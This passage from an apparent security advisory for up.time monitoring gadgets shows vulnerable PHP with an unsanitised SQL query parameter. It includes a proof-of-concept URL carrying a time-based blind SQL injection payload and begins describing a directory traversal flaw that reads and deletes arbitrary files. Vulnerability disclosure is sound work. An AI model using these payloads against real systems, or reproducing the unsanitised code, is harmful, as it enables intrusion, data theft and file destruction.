class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-11\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-12\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">isset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;metricType&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">metricType<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;metricType&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-14\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-15\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">isset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;element&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">element_id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;element&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-17\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-18\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">json<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-19\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">oneElement<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-20\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">performanceData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-21\"><span class=\"crayon-c\">\/\/date_default_timezone_set(&#8216;UTC&#8217;);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-22\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">uptimeDB<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-23\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gt<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">connectDB<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-25\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;unable to connect to DB exiting&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-28\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-29\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">query_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;xenserver-Mem&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">min_mem_usage_array<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">max_mem_usage_array<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">avg_mem_usage_array<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">getXenServerMemUsedsql<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;SELECT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-34\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;e.entity_id,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-35\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;e.display_name as NAME,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-36\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;date(dd.sampletime) as SAMPLE_TIME,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-37\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;min(dd.value) as MIN_MEM_USAGE,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-38\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;max(dd.value) as MAX_MEM_USAGE,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-39\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;avg(dd.value) as AVG_MEM_USAGE,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-40\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;day(dd.sampletime),<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-41\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;month(dd.sampletime),<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-42\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;year(dd.sampletime)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-43\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;FROM<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-44\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;erdc_base b, erdc_configuration c, erdc_parameter p,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-45\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;erdc_decimal_data dd, erdc_instance i, entity e<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-46\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;WHERE<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-47\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;b.name = &#8216;XenServer&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-48\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;AND<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-49\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;b.erdc_base_id = c.erdc_base_id AND<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-50\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;b.erdc_base_id = p.erdc_base_id AND<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-51\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;p.name = &#8216;hostMemUsed&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-52\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;AND<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-53\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;p.erdc_parameter_id = dd.erdc_parameter_id AND<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-54\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;dd.erdc_instance_id = i.erdc_instance_id AND<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-55\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;dd.sampletime &amp; gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-56\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;date_sub(now(), interval &#8220;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">_<\/span>frame<span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-57\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;month)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-58\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;AND<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-59\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;i.entity_id = e.entity_id AND<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-60\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;e.entity_id = $element_id<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-61\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;GROUP BY<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-62\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;e.entity_id,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-63\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;year(dd.sampletime),<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-64\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;month(dd.sampletime),<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-65\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;day(dd.sampletime)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-66\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0321 seconds] -->  <\/p>\n<p>Visiting the following URL will elicit a verbose SQL message from the vulnerable web application.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5939cd76532b4882663120\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/gadgets\/definitions\/uptime.CapacityWhatifGadget\/getxenmetrics.php?query_type=xenserver-Mem&amp;time_frame=1&amp;element=&#8217;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532b4882663120-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5939cd76532b4882663120-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">gadgets<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">definitions<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">uptime<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">CapacityWhatifGadget<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">getxenmetrics<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">query_type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">xenserver<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Mem<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">time_frame<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-o\">=<\/span>&#8216;<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5939cd76532b8034289354\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/192.168.199.129:9999\/gadgets\/definitions\/uptime.CapacityWhatifGadget\/getxenmetrics.php?query_type=xenserverMem&amp;time_frame=1&amp;element=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))tayk)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532b8034289354-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5939cd76532b8034289354-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.199.129:9999\/gadgets\/definitions\/uptime.CapacityWhatifGadget\/getxenmetrics.php?query_type=xenserverMem&amp;time_frame=1&amp;element=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))tayk)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p><strong>Directory Traversal and File Access<\/strong><br \/> User controlled input is not sufficiently sanitized, and then passed to a function responsible for accessing the filesystem. Successful exploitation of this vulnerability enables a remote unauthenticated user to read the content of any file existing on the host, this includes files located outside of the web root folder.<\/p>\n<p>The vulnerable code can be found in get2post.php file:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5939cd76532bd434214407\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> if(isset($_GET[&#8220;file_name&#8221;]) &amp;&amp; $_GET[&#8220;file_name&#8221;] != null){  $fileName = $_GET[&#8220;file_name&#8221;];  $data = file_get_contents($fileName);    $data = str_replace(&#8220;&#8221;&#8221;, &#8216;&amp;quot;&#8217;, $data);    unlink($fileName);    print(&#8220;&lt;input type=&#8221;hidden&#8221; name=&#8221;script&#8221; value=&#8221;&#8221;.$data.&#8221;&#8221;&gt;n&#8221;);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532bd434214407-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532bd434214407-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532bd434214407-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532bd434214407-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532bd434214407-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532bd434214407-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532bd434214407-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532bd434214407-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532bd434214407-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5939cd76532bd434214407-1\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">isset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;file_name&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;file_name&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532bd434214407-2\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">fileName<\/span><span class=\"crayon-h\"> 